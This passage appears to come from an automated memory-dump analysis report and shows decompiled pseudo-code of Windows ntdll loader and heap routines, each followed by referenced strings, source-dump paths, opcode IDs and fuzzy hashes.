                                                                                          						__eflags = _t118;
                                                                                          						if(_t118 != 0) {
                                                                                          							__eflags = _t161;
                                                                                          							if(_t161 != 0) {
                                                                                          								__eflags =  *(_t118 + 8);
                                                                                          								if( *(_t118 + 8) == 0) {
                                                                                          									L22:
                                                                                          									_t143 = 1;
                                                                                          									__eflags = 1;
                                                                                          								} else {
                                                                                          									_t19 = _t118 + 0x40; // 0x40
                                                                                          									_t156 = _t19;
                                                                                          									E01B48999(_t19,  &_v16);
                                                                                          									__eflags = _v0;
                                                                                          									if(_v0 != 0) {
                                                                                          										__eflags = _v0 - 1;
                                                                                          										if(_v0 != 1) {
                                                                                          											goto L22;
                                                                                          										} else {
                                                                                          											_t128 =  *(_t161 + 0x64);
                                                                                          											__eflags =  *(_t161 + 0x64);
                                                                                          											if( *(_t161 + 0x64) == 0) {
                                                                                          												goto L22;
                                                                                          											} else {
                                                                                          												E01B48999(_t128,  &_v12);
                                                                                          												_t147 = _v12;
                                                                                          												_t91 = 0;
                                                                                          												__eflags = 0;
                                                                                          												_t129 =  *_t147;
                                                                                          												while(1) {
                                                                                          													__eflags =  *((intOrPtr*)(0x1c25c60 + _t91 * 8)) - _t129;
                                                                                          													if( *((intOrPtr*)(0x1c25c60 + _t91 * 8)) == _t129) {
                                                                                          														break;
                                                                                          													}
                                                                                          													_t91 = _t91 + 1;
                                                                                          													__eflags = _t91 - 5;
                                                                                          													if(_t91 < 5) {
                                                                                          														continue;
                                                                                          													} else {
                                                                                          														_t131 = 0;
                                                                                          														__eflags = 0;
                                                                                          													}
                                                                                          													L37:
                                                                                          													__eflags = _t131;
                                                                                          													if(_t131 != 0) {
                                                                                          														goto L22;
                                                                                          													} else {
                                                                                          														__eflags = _v16 - _t147;
                                                                                          														if(_v16 != _t147) {
                                                                                          															goto L22;
                                                                                          														} else {
                                                                                          															E01B52280(_t92, 0x1c286cc);
                                                                                          															_t94 = E01C09DFB( &_v20);
                                                                                          															__eflags = _t94 - 1;
                                                                                          															if(_t94 != 1) {
                                                                                          															}
                                                                                          															asm("movsd");
                                                                                          															asm("movsd");
                                                                                          															asm("movsd");
                                                                                          															asm("movsd");
                                                                                          															 *_t118 =  *_t118 + 1;
                                                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                                                          															_t95 = E01B661A0( &_v32);
                                                                                          															__eflags = _t95;
                                                                                          															if(_t95 != 0) {
                                                                                          																__eflags = _v32 | _v28;
                                                                                          																if((_v32 | _v28) != 0) {
                                                                                          																	_t71 = _t118 + 0x40; // 0x3f
                                                                                          																	_t134 = _t71;
                                                                                          																	goto L55;
                                                                                          																}
                                                                                          															}
                                                                                          															goto L30;
                                                                                          														}
                                                                                          													}
                                                                                          													goto L56;
                                                                                          												}
                                                                                          												_t92 = 0x1c25c64 + _t91 * 8;
                                                                                          												asm("lock xadd [eax], ecx");
                                                                                          												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                          												goto L37;
                                                                                          											}
                                                                                          										}
                                                                                          										goto L56;
                                                                                          									} else {
                                                                                          										_t143 = E01B48A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                          										__eflags = _t143;
                                                                                          										if(_t143 != 0) {
                                                                                          											_t157 = _v12;
                                                                                          											_t103 = 0;
                                                                                          											__eflags = 0;
                                                                                          											_t136 =  &(_t157[1]);
                                                                                          											 *(_t161 + 0x64) = _t136;
                                                                                          											_t151 =  *_t157;
                                                                                          											_v20 = _t136;
                                                                                          											while(1) {
                                                                                          												__eflags =  *((intOrPtr*)(0x1c25c60 + _t103 * 8)) - _t151;
                                                                                          												if( *((intOrPtr*)(0x1c25c60 + _t103 * 8)) == _t151) {
                                                                                          													break;
                                                                                          												}
                                                                                          												_t103 = _t103 + 1;
                                                                                          												__eflags = _t103 - 5;
                                                                                          												if(_t103 < 5) {
                                                                                          													continue;
                                                                                          												}
                                                                                          												L21:
                                                                                          												_t105 = E01B7F380(_t136, 0x1b11184, 0x10);
                                                                                          												__eflags = _t105;
                                                                                          												if(_t105 != 0) {
                                                                                          													__eflags =  *_t157 -  *_v16;
                                                                                          													if( *_t157 >=  *_v16) {
                                                                                          														goto L22;
                                                                                          													} else {
                                                                                          														asm("cdq");
                                                                                          														_t166 = _t157[5] & 0x0000ffff;
                                                                                          														_t108 = _t157[5] & 0x0000ffff;
                                                                                          														asm("cdq");
                                                                                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                          														if(__eflags > 0) {
                                                                                          															L29:
                                                                                          															E01B52280(_t108, 0x1c286cc);
                                                                                          															 *_t118 =  *_t118 + 1;
                                                                                          															_t42 = _t118 + 0x40; // 0x3f
                                                                                          															_t156 = _t42;
                                                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                                                          															asm("movsd");
                                                                                          															asm("movsd");
                                                                                          															asm("movsd");
                                                                                          															asm("movsd");
                                                                                          															_t110 = E01B661A0( &_v32);
                                                                                          															__eflags = _t110;
                                                                                          															if(_t110 != 0) {
                                                                                          																__eflags = _v32 | _v28;
                                                                                          																if((_v32 | _v28) != 0) {
                                                                                          																	_t134 = _v20;
                                                                                          																	L55:
                                                                                          																	E01C09D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                          																}
                                                                                          															}
                                                                                          															L30:
                                                                                          															 *_t118 =  *_t118 + 1;
                                                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                                                          															E01B4FFB0(_t118, _t156, 0x1c286cc);
                                                                                          															goto L22;
                                                                                          														} else {
                                                                                          															if(__eflags < 0) {
                                                                                          																goto L22;
                                                                                          															} else {
                                                                                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                          																	goto L22;
                                                                                          																} else {
                                                                                          																	goto L29;
                                                                                          																}
                                                                                          															}
                                                                                          														}
                                                                                          													}
                                                                                          													goto L56;
                                                                                          												}
                                                                                          												goto L22;
                                                                                          											}
                                                                                          											asm("lock inc dword [eax]");
                                                                                          											goto L21;
                                                                                          										}
                                                                                          									}
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          						return _t143;
                                                                                          					}
                                                                                          				} else {
                                                                                          					_push( &_v8);
                                                                                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                          					_push(__ecx + 0x40);
                                                                                          					_push(_t121);
                                                                                          					_push(0xffffffff);
                                                                                          					_t80 = E01B79A00();
                                                                                          					_t159 = _t80;
                                                                                          					if(_t159 < 0) {
                                                                                          						L8:
                                                                                          						return _t80;
                                                                                          					} else {
                                                                                          						goto L2;
                                                                                          					}
                                                                                          				}
                                                                                          				L56:
                                                                                          			}
                                                                                          0x01b48970
                                                                                          0x01b48970
                                                                                          0x01b48972
                                                                                          0x01b48972
                                                                                          0x01b48974
                                                                                          0x00000000
                                                                                          0x01b4897a
                                                                                          0x01b4897a
                                                                                          0x01b4897d
                                                                                          0x00000000
                                                                                          0x01b48983
                                                                                          0x01b99c65
                                                                                          0x01b99c6d
                                                                                          0x01b99c72
                                                                                          0x01b99c75
                                                                                          0x01b99c75
                                                                                          0x01b99c82
                                                                                          0x01b99c86
                                                                                          0x01b99c87
                                                                                          0x01b99c88
                                                                                          0x01b99c89
                                                                                          0x01b99c8c
                                                                                          0x01b99c90
                                                                                          0x01b99c95
                                                                                          0x01b99c97
                                                                                          0x01b99ca0
                                                                                          0x01b99ca3
                                                                                          0x01b99ca9
                                                                                          0x01b99ca9
                                                                                          0x00000000
                                                                                          0x01b99ca9
                                                                                          0x01b99ca3
                                                                                          0x00000000
                                                                                          0x01b99c97
                                                                                          0x01b4897d
                                                                                          0x00000000
                                                                                          0x01b48974
                                                                                          0x01b48988
                                                                                          0x01b48992
                                                                                          0x01b48996
                                                                                          0x00000000
                                                                                          0x01b48996
                                                                                          0x01b4894c
                                                                                          0x00000000
                                                                                          0x01b48870
                                                                                          0x01b4887b
                                                                                          0x01b4887d
                                                                                          0x01b4887f
                                                                                          0x01b48881
                                                                                          0x01b48884
                                                                                          0x01b48884
                                                                                          0x01b48886
                                                                                          0x01b48889
                                                                                          0x01b4888c
                                                                                          0x01b4888e
                                                                                          0x01b48891
                                                                                          0x01b48891
                                                                                          0x01b48898
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b4889a
                                                                                          0x01b4889b
                                                                                          0x01b4889e
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b488a0
                                                                                          0x01b488a8
                                                                                          0x01b488b0
                                                                                          0x01b488b2
                                                                                          0x01b488d3
                                                                                          0x01b488d5
                                                                                          0x00000000
                                                                                          0x01b488d7
                                                                                          0x01b488db
                                                                                          0x01b488dc
                                                                                          0x01b488e0
                                                                                          0x01b488e8
                                                                                          0x01b488ee
                                                                                          0x01b488f0
                                                                                          0x01b488f3
                                                                                          0x01b488fc
                                                                                          0x01b48901
                                                                                          0x01b48906
                                                                                          0x01b4890c
                                                                                          0x01b4890c
                                                                                          0x01b4890f
                                                                                          0x01b48916
                                                                                          0x01b48917
                                                                                          0x01b48918
                                                                                          0x01b48919
                                                                                          0x01b4891a
                                                                                          0x01b4891f
                                                                                          0x01b48921
                                                                                          0x01b99c52
                                                                                          0x01b99c55
                                                                                          0x01b99c5b
                                                                                          0x01b99cac
                                                                                          0x01b99cc0
                                                                                          0x01b99cc0
                                                                                          0x01b99c55
                                                                                          0x01b48927
                                                                                          0x01b48927
                                                                                          0x01b4892f
                                                                                          0x01b48933
                                                                                          0x00000000
                                                                                          0x01b488f5
                                                                                          0x01b488f5
                                                                                          0x00000000
                                                                                          0x01b488f7
                                                                                          0x01b488f7
                                                                                          0x01b488fa
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b488fa
                                                                                          0x01b488f5
                                                                                          0x01b488f3
                                                                                          0x00000000
                                                                                          0x01b488d5
                                                                                          0x00000000
                                                                                          0x01b488b2
                                                                                          0x01b488c9
                                                                                          0x00000000
                                                                                          0x01b488c9
                                                                                          0x01b4887f
                                                                                          0x01b4886a
                                                                                          0x01b48857
                                                                                          0x01b48852
                                                                                          0x01b488bf
                                                                                          0x01b488bf
                                                                                          0x01b487aa
                                                                                          0x01b487ad
                                                                                          0x01b487ae
                                                                                          0x01b487b4
                                                                                          0x01b487b5
                                                                                          0x01b487b6
                                                                                          0x01b487b8
                                                                                          0x01b487bd
                                                                                          0x01b487c1
                                                                                          0x01b487f4
                                                                                          0x01b487fa
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b487c1
                                                                                          0x00000000

                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01B99C28
                                                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01B99C18
                                                                                          • LdrpDoPostSnapWork, xrefs: 01B99C1E
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                          • API String ID: 2994545307-1948996284
                                                                                          • Opcode ID: a8da0d9a0844e9716b3bb1c89b7ee149e096fc934d057c1aed3a1ef63f012eef
                                                                                          • Instruction ID: 431c9e02594340d396da4e693fc647012bf80287b22f9b0dc7eaa5c1e0b630e3
                                                                                          • Opcode Fuzzy Hash: a8da0d9a0844e9716b3bb1c89b7ee149e096fc934d057c1aed3a1ef63f012eef
                                                                                          • Instruction Fuzzy Hash: F0911131A00216DFEF2CDF99D880ABAB7B5FF54314B0481E9EA05AB251E730E901DB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 74%
                                                                                          			E01B5B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                                                                          				signed int _v8;
                                                                                          				char _v12;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* __ebp;
                                                                                          				void* _t72;
                                                                                          				char _t76;
                                                                                          				signed char _t77;
                                                                                          				intOrPtr* _t80;
                                                                                          				unsigned int _t85;
                                                                                          				signed int* _t86;
                                                                                          				signed int _t88;
                                                                                          				signed char _t89;
                                                                                          				intOrPtr _t90;
                                                                                          				intOrPtr _t101;
                                                                                          				intOrPtr* _t111;
                                                                                          				void* _t117;
                                                                                          				intOrPtr* _t118;
                                                                                          				signed int _t120;
                                                                                          				signed char _t121;
                                                                                          				intOrPtr* _t123;
                                                                                          				signed int _t126;
                                                                                          				intOrPtr _t136;
                                                                                          				signed int _t139;
                                                                                          				void* _t140;
                                                                                          				signed int _t141;
                                                                                          				void* _t147;
                                                                                          
                                                                                          				_t111 = _a4;
                                                                                          				_t140 = __ecx;
                                                                                          				_v8 = __edx;
                                                                                          				_t3 = _t111 + 0x18; // 0x0
                                                                                          				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                                                                          				_t5 = _t111 - 8; // -32
                                                                                          				_t141 = _t5;
                                                                                          				 *(_t111 + 0x14) = _a8;
                                                                                          				_t72 = 4;
                                                                                          				 *(_t141 + 2) = 1;
                                                                                          				 *_t141 = _t72;
                                                                                          				 *((char*)(_t141 + 7)) = 3;
                                                                                          				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                                                                          				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                                                                          					_t76 = (_t141 - __edx >> 0x10) + 1;
                                                                                          					_v12 = _t76;
                                                                                          					__eflags = _t76 - 0xfe;
                                                                                          					if(_t76 >= 0xfe) {
                                                                                          						_push(__edx);
                                                                                          						_push(0);
                                                                                          						E01BFA80D(_t134, 3, _t141, __edx);
                                                                                          						_t76 = _v12;
                                                                                          					}
                                                                                          				} else {
                                                                                          					_t76 = 0;
                                                                                          				}
                                                                                          				 *((char*)(_t141 + 6)) = _t76;
                                                                                          				if( *0x1c28748 >= 1) {
                                                                                          					__eflags = _a12 - _t141;
                                                                                          					if(_a12 <= _t141) {
                                                                                          						goto L4;
                                                                                          					}
                                                                                          					_t101 =  *[fs:0x30];
                                                                                          					__eflags =  *(_t101 + 0xc);
                                                                                          					if( *(_t101 + 0xc) == 0) {
                                                                                          						_push("HEAP: ");
                                                                                          						E01B3B150();
                                                                                          					} else {
                                                                                          						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          					}
                                                                                          					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                                                                          					E01B3B150();
                                                                                          					__eflags =  *0x1c27bc8;
                                                                                          					if(__eflags == 0) {
                                                                                          						E01BF2073(_t111, 1, _t140, __eflags);
                                                                                          					}
                                                                                          					goto L3;
                                                                                          				} else {
                                                                                          					L3:
                                                                                          					_t147 = _a12 - _t141;
                                                                                          					L4:
                                                                                          					if(_t147 != 0) {
                                                                                          						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                                                                          					}
                                                                                          					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                                                                          						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                                                                          						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                                                                          					}
                                                                                          					_t135 =  *(_t111 + 0x14);
                                                                                          					if( *(_t111 + 0x14) == 0) {
                                                                                          						L12:
                                                                                          						_t77 =  *((intOrPtr*)(_t141 + 6));
                                                                                          						if(_t77 != 0) {
                                                                                          							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                                                                          						} else {
                                                                                          							_t117 = _t140;
                                                                                          						}
                                                                                          						_t118 = _t117 + 0x38;
                                                                                          						_t26 = _t111 + 8; // -16
                                                                                          						_t80 = _t26;
                                                                                          						_t136 =  *_t118;
                                                                                          						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                                                                          							_push(_t118);
                                                                                          							_push(0);
                                                                                          							E01BFA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                                                                          						} else {
                                                                                          							 *_t80 = _t136;
                                                                                          							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                                                                          							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                                                                          							 *_t118 = _t80;
                                                                                          						}
                                                                                          						_t120 = _v8;
                                                                                          						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                                                                          						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                                                                          						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                                                                          						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                                                                          						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                                                                          							__eflags =  *(_t140 + 0xb8);
                                                                                          							if( *(_t140 + 0xb8) == 0) {
                                                                                          								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                                                                          								__eflags = _t88 - 2;
                                                                                          								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                                                                          								__eflags =  *0x1c28720 & 0x00000001;
                                                                                          								_t89 = _t88 & 0xffffff00 | ( *0x1c28720 & 0x00000001) == 0x00000000;
                                                                                          								__eflags = _t89 & _t121;
                                                                                          								if((_t89 & _t121) != 0) {
                                                                                          									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          						_t85 =  *(_t111 + 0x14);
                                                                                          						if(_t85 >= 0x7f000) {
                                                                                          							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                                                                          						}
                                                                                          						_t86 = _a16;
                                                                                          						 *_t86 = _t141 - _a12 >> 3;
                                                                                          						return _t86;
                                                                                          					} else {
                                                                                          						_t90 = E01B5B8E4(_t135);
                                                                                          						_t123 =  *((intOrPtr*)(_t90 + 4));
                                                                                          						if( *_t123 != _t90) {
                                                                                          							_push(_t123);
                                                                                          							_push( *_t123);
                                                                                          							E01BFA80D(0, 0xd, _t90, 0);
                                                                                          						} else {
                                                                                          							 *_t111 = _t90;
                                                                                          							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                                                                          							 *_t123 = _t111;
                                                                                          							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                                                                          						}
                                                                                          						_t139 =  *(_t140 + 0xb8);
                                                                                          						if(_t139 != 0) {
                                                                                          							_t93 =  *(_t111 + 0x14) >> 0xc;
                                                                                          							__eflags = _t93;
                                                                                          							while(1) {
                                                                                          								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                                                                          								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                                                                          									break;
                                                                                          								}
                                                                                          								_t126 =  *_t139;
                                                                                          								__eflags = _t126;
                                                                                          								if(_t126 != 0) {
                                                                                          									_t139 = _t126;
                                                                                          									continue;
                                                                                          								}
                                                                                          								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                                          								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                                          								break;
                                                                                          							}
                                                                                          							E01B5E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                                                                          						}
                                                                                          						goto L12;
                                                                                          					}
                                                                                          				}
                                                                                          			}

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-1334570610
                                                                                          • Opcode ID: c26d6455c1e674d80ea32b7f17d6ad6fc5f4be3a6aa2bfc9fc6ae304b0c85fcd
                                                                                          • Instruction ID: 8e9648cfdebd8b5866650a516168090765a07d267543084188597380c1c28c27
                                                                                          • Opcode Fuzzy Hash: c26d6455c1e674d80ea32b7f17d6ad6fc5f4be3a6aa2bfc9fc6ae304b0c85fcd
                                                                                          • Instruction Fuzzy Hash: E261C071600201DFDB6DDF28C681B6ABBE2FF44304F5885EEE84A8B255D770E891CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 98%
                                                                                          			E01B47E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                          				char _v8;
                                                                                          				intOrPtr _v12;
                                                                                          				intOrPtr _v16;
                                                                                          				intOrPtr _v20;
                                                                                          				char _v24;
                                                                                          				signed int _t73;
                                                                                          				void* _t77;
                                                                                          				char* _t82;
                                                                                          				char* _t87;
                                                                                          				signed char* _t97;
                                                                                          				signed char _t102;
                                                                                          				intOrPtr _t107;
                                                                                          				signed char* _t108;
                                                                                          				intOrPtr _t112;
                                                                                          				intOrPtr _t124;
                                                                                          				intOrPtr _t125;
                                                                                          				intOrPtr _t126;
                                                                                          
                                                                                          				_t107 = __edx;
                                                                                          				_v12 = __ecx;
                                                                                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                          				_t124 = 0;
                                                                                          				_v20 = __edx;
                                                                                          				if(E01B4CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                                          					_t112 = _v8;
                                                                                          				} else {
                                                                                          					_t112 = 0;
                                                                                          					_v8 = 0;
                                                                                          				}
                                                                                          				if(_t112 != 0) {
                                                                                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                                          						_t124 = 0xc000007b;
                                                                                          						goto L8;
                                                                                          					}
                                                                                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                                          					 *(_t125 + 0x34) = _t73;
                                                                                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                                          						goto L3;
                                                                                          					}
                                                                                          					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                                          					_t124 = E01B3C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                                          					if(_t124 < 0) {
                                                                                          						goto L8;
                                                                                          					} else {
                                                                                          						goto L3;
                                                                                          					}
                                                                                          				} else {
                                                                                          					L3:
                                                                                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                                          						L8:
                                                                                          						return _t124;
                                                                                          					}
                                                                                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                                          							goto L5;
                                                                                          						}
                                                                                          						_t102 =  *0x1c25780; // 0x0
                                                                                          						if((_t102 & 0x00000003) != 0) {
                                                                                          							E01BB5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                                          							_t102 =  *0x1c25780; // 0x0
                                                                                          						}
                                                                                          						if((_t102 & 0x00000010) != 0) {
                                                                                          							asm("int3");
                                                                                          						}
                                                                                          						_t124 = 0xc0000428;
                                                                                          						goto L8;
                                                                                          					}
                                                                                          					L5:
                                                                                          					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                                          						goto L8;
                                                                                          					}
                                                                                          					_t77 = _a4 - 0x40000003;
                                                                                          					if(_t77 == 0 || _t77 == 0x33) {
                                                                                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                          						if(E01B57D50() != 0) {
                                                                                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                          						} else {
                                                                                          							_t82 = 0x7ffe0384;
                                                                                          						}
                                                                                          						_t108 = 0x7ffe0385;
                                                                                          						if( *_t82 != 0) {
                                                                                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                          								if(E01B57D50() == 0) {
                                                                                          									_t97 = 0x7ffe0385;
                                                                                          								} else {
                                                                                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                          								}
                                                                                          								if(( *_t97 & 0x00000020) != 0) {
                                                                                          									E01BB7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          						if(_a4 != 0x40000003) {
                                                                                          							L14:
                                                                                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                          							if(E01B57D50() != 0) {
                                                                                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                          							} else {
                                                                                          								_t87 = 0x7ffe0384;
                                                                                          							}
                                                                                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                          								if(E01B57D50() != 0) {
                                                                                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                          								}
                                                                                          								if(( *_t108 & 0x00000020) != 0) {
                                                                                          									E01BB7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                                          								}
                                                                                          							}
                                                                                          							goto L8;
                                                                                          						} else {
                                                                                          							_v16 = _t125 + 0x24;
                                                                                          							_t124 = E01B6A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                                          							if(_t124 < 0) {
                                                                                          								E01B3B1E1(_t124, 0x1490, 0, _v16);
                                                                                          								goto L8;
                                                                                          							}
                                                                                          							goto L14;
                                                                                          						}
                                                                                          					} else {
                                                                                          						goto L8;
                                                                                          					}
                                                                                          				}
                                                                                          			}





















                                                                                          Strings
                                                                                          • LdrpCompleteMapModule, xrefs: 01B99898
                                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 01B998A2
                                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01B99891
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                          • API String ID: 0-1676968949
                                                                                          • Opcode ID: a60a4fa2caf2f99f0197b3e45991ecf47950fc5b1dfb3f2ceaba9d57835ae5f9
                                                                                          • Instruction ID: 7fe8da9113321e704598da02bcc560ca650af5d0cd623f69060371719b94386f
                                                                                          • Opcode Fuzzy Hash: a60a4fa2caf2f99f0197b3e45991ecf47950fc5b1dfb3f2ceaba9d57835ae5f9
                                                                                          • Instruction Fuzzy Hash: 4A51F131640742DBEB3ACB6CC984B6A7BA8EB00714F4447E9E9519B7E1DB30ED01D791
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 93%
                                                                                          			E01B3E620(void* __ecx, short* __edx, short* _a4) {
                                                                                          				char _v16;
                                                                                          				char _v20;
                                                                                          				intOrPtr _v24;
                                                                                          				char* _v28;
                                                                                          				char _v32;
                                                                                          				char _v36;
                                                                                          				char _v44;
                                                                                          				signed int _v48;
                                                                                          				intOrPtr _v52;
                                                                                          				void* _v56;
                                                                                          				void* _v60;
                                                                                          				char _v64;
                                                                                          				void* _v68;
                                                                                          				void* _v76;
                                                                                          				void* _v84;
                                                                                          				signed int _t59;
                                                                                          				signed int _t74;
                                                                                          				signed short* _t75;
                                                                                          				signed int _t76;
                                                                                          				signed short* _t78;
                                                                                          				signed int _t83;
                                                                                          				short* _t93;
                                                                                          				signed short* _t94;
                                                                                          				short* _t96;
                                                                                          				void* _t97;
                                                                                          				signed int _t99;
                                                                                          				void* _t101;
                                                                                          				void* _t102;
                                                                                          
                                                                                          				_t80 = __ecx;
                                                                                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                                          				_t96 = __edx;
                                                                                          				_v44 = __edx;
                                                                                          				_t78 = 0;
                                                                                          				_v56 = 0;
                                                                                          				if(__ecx == 0 || __edx == 0) {
                                                                                          					L28:
                                                                                          					_t97 = 0xc000000d;
                                                                                          				} else {
                                                                                          					_t93 = _a4;
                                                                                          					if(_t93 == 0) {
                                                                                          						goto L28;
                                                                                          					}
                                                                                          					_t78 = E01B3F358(__ecx, 0xac);
                                                                                          					if(_t78 == 0) {
                                                                                          						_t97 = 0xc0000017;
                                                                                          						L6:
                                                                                          						if(_v56 != 0) {
                                                                                          							_push(_v56);
                                                                                          							E01B795D0();
                                                                                          						}
                                                                                          						if(_t78 != 0) {
                                                                                          							L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                                          						}
                                                                                          						return _t97;
                                                                                          					}
                                                                                          					E01B7FA60(_t78, 0, 0x158);
                                                                                          					_v48 = _v48 & 0x00000000;
                                                                                          					_t102 = _t101 + 0xc;
                                                                                          					 *_t96 = 0;
                                                                                          					 *_t93 = 0;
